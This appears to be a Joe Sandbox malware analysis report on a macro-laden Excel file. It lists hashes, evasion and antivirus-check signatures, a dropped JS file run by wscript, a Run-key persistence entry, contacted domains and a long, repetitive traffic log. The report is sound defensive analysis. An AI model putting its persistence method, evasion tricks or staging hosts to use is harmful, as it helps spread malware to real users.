Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Techspan Statement.xlsm

Overview

General Information

Sample name:Techspan Statement.xlsm
Analysis ID:1354817
MD5:f769ba7282d512a16fbf552e4f90723a
SHA1:80fa8fa28d4655bd1890a8d96f7bf3abd76ac0e4
SHA256:5a4b747e7daabd11e3ab84f9e239a03a1dc29f88c4d7efb957cf5327b9a21e53
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Sigma detected: Register Wscript In Run Key
Creates processes via WMI
Machine Learning detection for sample
Microsoft Office drops suspicious files
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check the online IP address of the machine
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64_ra
  • EXCEL.EXE (PID: 5188 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Techspan Statement.xlsm MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 4436 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • WmiPrvSE.exe (PID: 5032 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • wscript.exe (PID: 4988 cmdline: C:\Windows\System32\wscript.exe //b "C:\Users\user\5DWDMMR9NH2K.JS" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 7120 cmdline: C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JS MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

Persistence and Installation Behavior

barindex
Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Roaming\OracleX\5DWDMMR9NH2K.JS", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 4988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5DWDMMR9NH2K
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://autodiscover.com/Autodiscover/Autodiscover.xmlAvira URL Cloud: Label: phishing
Source: Techspan Statement.xlsmJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.219.40:443 -> 192.168.2.16:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 190.123.45.87:443 -> 192.168.2.16:49739 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\5DWDMMR9NH2K.JSJump to behavior
Source: global trafficDNS query: name: raw.githubusercontent.com
Source: global trafficDNS query: name: codeberg.org
Source: global trafficDNS query: name: ipinfo.io
Source: global trafficDNS query: name: webmicroengine.com
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49737 -> 217.197.91.145:443
Source: global trafficTCP traffic: 192.168.2.16:49738 -> 34.117.59.81:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49730 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49729 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49726 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49728 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49727 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49733 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49732 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49735 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49734 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49731 -> 13.107.219.40:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
Source: global trafficTCP traffic: 192.168.2.16:49736 -> 185.199.111.133:443
